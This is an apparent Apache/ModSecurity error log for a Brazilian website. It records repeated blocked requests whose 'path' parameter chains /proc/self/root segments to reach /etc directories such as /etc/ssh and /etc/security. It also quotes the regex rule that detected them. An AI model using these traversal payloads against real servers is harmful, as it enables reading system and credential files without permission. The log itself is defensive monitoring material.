[uri "/"] [unique_id "ab1pzjJ3M9BSuKP7CAZmgAAAAJA"], referer: https://www.bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/etc
[Fri Mar 20 12:37:50.916273 2026] [:error] [pid 31215:tid 140411616036608] [client 74.7.241.31:41658] [client 74.7.241.31] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/self/root/etc/lwcorp"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/"] [unique_id "ab1pzgF0L0L-SsrnPo6jdwAAAs8"], referer: https://bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/self/root/etc
[Fri Mar 20 12:37:52.231417 2026] [:error] [pid 7235:tid 140411699963648] [client 74.7.241.31:41668] [client 74.7.241.31] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/self/root/etc/python"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/"] [unique_id "ab1p0PqxLDW4GITHUkQnygAAAQU"], referer: https://bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/self/root/etc
[Fri Mar 20 12:37:52.713861 2026] [mime_magic:error] [pid 10189:tid 140411699963648] (70014)End of file found: [client 216.73.216.191:39414] AH01513: mod_mime_magic: read failed: /home/storage/0/fc/16/bandeirantesbomb3/public_html/index.php
[Fri Mar 20 12:37:53.171289 2026] [:error] [pid 10189:tid 140411683178240] [client 74.7.243.128:44768] [client 74.7.243.128] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/etc/php"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.bandeirantesbombas.com.br"] [uri "/"] [unique_id "ab1p0TJ3M9BSuKP7CAZmhgAAAIc"], referer: https://www.bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/etc
[Fri Mar 20 12:37:54.691586 2026] [:error] [pid 7893:tid 140411649607424] [client 74.7.243.128:44782] [client 74.7.243.128] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/etc/php-fpm"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.bandeirantesbombas.com.br"] [uri "/"] [unique_id "ab1p0hCii7xarUs8iHam4AAAAgs"], referer: https://www.bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/etc
[Fri Mar 20 12:37:57.084406 2026] [:error] [pid 21219:tid 140411565680384] [client 74.7.241.31:41670] [client 74.7.241.31] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/self/root/etc/depmod.d"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/"] [unique_id "ab1p1fXLqtnMIWvjpaLZSAAAApU"], referer: https://bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/self/root/etc
[Fri Mar 20 12:37:57.247123 2026] [:error] [pid 7893:tid 140411590858496] [client 74.7.243.128:44792] [client 74.7.243.128] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/etc/php"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.bandeirantesbombas.com.br"] [uri "/"] [unique_id "ab1p1RCii7xarUs8iHam6AAAAhI"], referer: https://www.bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/etc
[Fri Mar 20 12:37:59.816820 2026] [:error] [pid 26799:tid 140411582465792] [client 74.7.241.31:55662] [client 74.7.241.31] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/self/root/etc/ipmi"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/"] [unique_id "ab1p19a6ubjKNq_cu4YZvAAAA1M"], referer: https://bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/self/root/etc
[Fri Mar 20 12:38:00.417782 2026] [mime_magic:error] [pid 7893:tid 140411624429312] (70014)End of file found: [client 57.141.18.114:39980] AH01513: mod_mime_magic: read failed: /home/storage/0/fc/16/bandeirantesbomb3/public_html/index.php
[Fri Mar 20 12:38:02.960354 2026] [:error] [pid 9818:tid 140411658000128] [client 74.7.243.128:44808] [client 74.7.243.128] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/thread-self/root/etc/php-fpm"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.bandeirantesbombas.com.br"] [uri "/"] [unique_id "ab1p2l1pVZ5mVmJwsFNqJAAAAEo"], referer: https://www.bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/thread-self/root/etc
[Fri Mar 20 12:38:03.004127 2026] [:error] [pid 31215:tid 140411599251200] [client 74.7.241.31:55670] [client 74.7.241.31] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/self/root/etc/cloud"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/"] [unique_id "ab1p2wF0L0L-SsrnPo6jgwAAAtE"], referer: https://bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/self/root/etc
[Fri Mar 20 12:38:04.358984 2026] [:error] [pid 11167:tid 140411674785536] [client 74.7.241.31:55686] [client 74.7.241.31] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/self/root/etc/popt.d"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/"] [unique_id "ab1p3PHIg5MgXLBnicMwAAAAAcg"], referer: https://bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/self/root/etc
[Fri Mar 20 12:38:05.747018 2026] [:error] [pid 10189:tid 140411649607424] [client 74.7.241.31:55688] [client 74.7.241.31] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/self/root/etc/modprobe.d"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/"] [unique_id "ab1p3TJ3M9BSuKP7CAZmnQAAAIs"], referer: https://bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/self/root/etc
[Fri Mar 20 12:38:07.211996 2026] [:error] [pid 26799:tid 140411649607424] [client 74.7.241.31:55704] [client 74.7.241.31] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/self/root/etc/sysconfig"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/"] [unique_id "ab1p39a6ubjKNq_cu4YZwgAAA0s"], referer: https://bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/self/root/etc
[Fri Mar 20 12:38:13.628055 2026] [:error] [pid 10189:tid 140411599251200] [client 74.7.243.128:60626] [client 74.7.243.128] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/proc/thread-self/root/etc/php-fpm"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.bandeirantesbombas.com.br"] [uri "/"] [unique_id "ab1p5DJ3M9BSuKP7CAZmrQAAAJE"], referer: https://www.bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/proc/thread-self/root/etc
[Fri Mar 20 12:38:16.249479 2026] [:error] [pid 10189:tid 140411658000128] [client 74.7.241.31:36850] [client 74.7.241.31] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/self/root/etc/ld.so.conf.d"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/"] [unique_id "ab1p6DJ3M9BSuKP7CAZmsQAAAIo"], referer: https://bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/self/root/etc
[Fri Mar 20 12:38:18.944747 2026] [:error] [pid 10189:tid 140411725141760] [client 74.7.243.128:43234] [client 74.7.243.128] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/etc/php"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.bandeirantesbombas.com.br"] [uri "/"] [unique_id "ab1p6jJ3M9BSuKP7CAZmtQAAAII"], referer: https://www.bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/etc
[Fri Mar 20 12:38:21.717346 2026] [:error] [pid 11167:tid 140411725141760] [client 74.7.241.31:36972] [client 74.7.241.31] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/self/root/etc/security"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/"] [unique_id "ab1p7fHIg5MgXLBnicMwGQAAAcI"], referer: https://bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/self/root/etc
[Fri Mar 20 12:38:23.640178 2026] [:error] [pid 11167:tid 140411565680384] [client 74.7.243.128:45996] [client 74.7.243.128] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/etc/php"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.bandeirantesbombas.com.br"] [uri "/"] [unique_id "ab1p7_HIg5MgXLBnicMwIQAAAdU"], referer: https://www.bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/etc
[Fri Mar 20 12:38:25.594685 2026] [:error] [pid 11167:tid 140411666392832] [client 74.7.241.31:36974] [client 74.7.241.31] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/self/root/etc/pm"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/"] [unique_id "ab1p8fHIg5MgXLBnicMwJQAAAck"], referer: https://bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/self/root/etc
[Fri Mar 20 12:38:27.918043 2026] [mime_magic:error] [pid 11642:tid 140411641214720] (70014)End of file found: [client 216.73.216.191:41692] AH01513: mod_mime_magic: read failed: /home/storage/0/fc/16/bandeirantesbomb3/public_html/index.php
[Fri Mar 20 12:38:39.471620 2026] [mime_magic:error] [pid 9818:tid 140411599251200] (70014)End of file found: [client 216.73.216.191:42434] AH01513: mod_mime_magic: read failed: /home/storage/0/fc/16/bandeirantesbomb3/public_html/index.php
[Fri Mar 20 12:38:40.192828 2026] [:error] [pid 10189:tid 140411548894976] [client 74.7.241.31:36988] [client 74.7.241.31] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/self/root/etc/tmpfiles.d"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/"] [unique_id "ab1qADJ3M9BSuKP7CAZm3gAAAJc"], referer: https://bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/self/root/etc
[Fri Mar 20 12:38:40.205383 2026] [mime_magic:error] [pid 21219:tid 140411624429312] (70014)End of file found: [client 216.73.216.191:42506] AH01513: mod_mime_magic: read failed: /home/storage/0/fc/16/bandeirantesbomb3/public_html/index.php
[Fri Mar 20 12:38:40.205813 2026] [mime_magic:error] [pid 10189:tid 140411548894976] (70014)End of file found: [client 74.7.241.31:36988] AH01513: mod_mime_magic: read failed: /home/storage/0/fc/16/bandeirantesbomb3/public_html/index.php, referer: https://bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/self/root/etc
[Fri Mar 20 12:38:41.756007 2026] [:error] [pid 11642:tid 140411708356352] [client 74.7.241.31:37788] [client 74.7.241.31] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/self/root/etc/ssh"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/"] [unique_id "ab1qAbninkcc-iUj5AqW4wAAA4Q"], referer: https://bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/self/root/etc
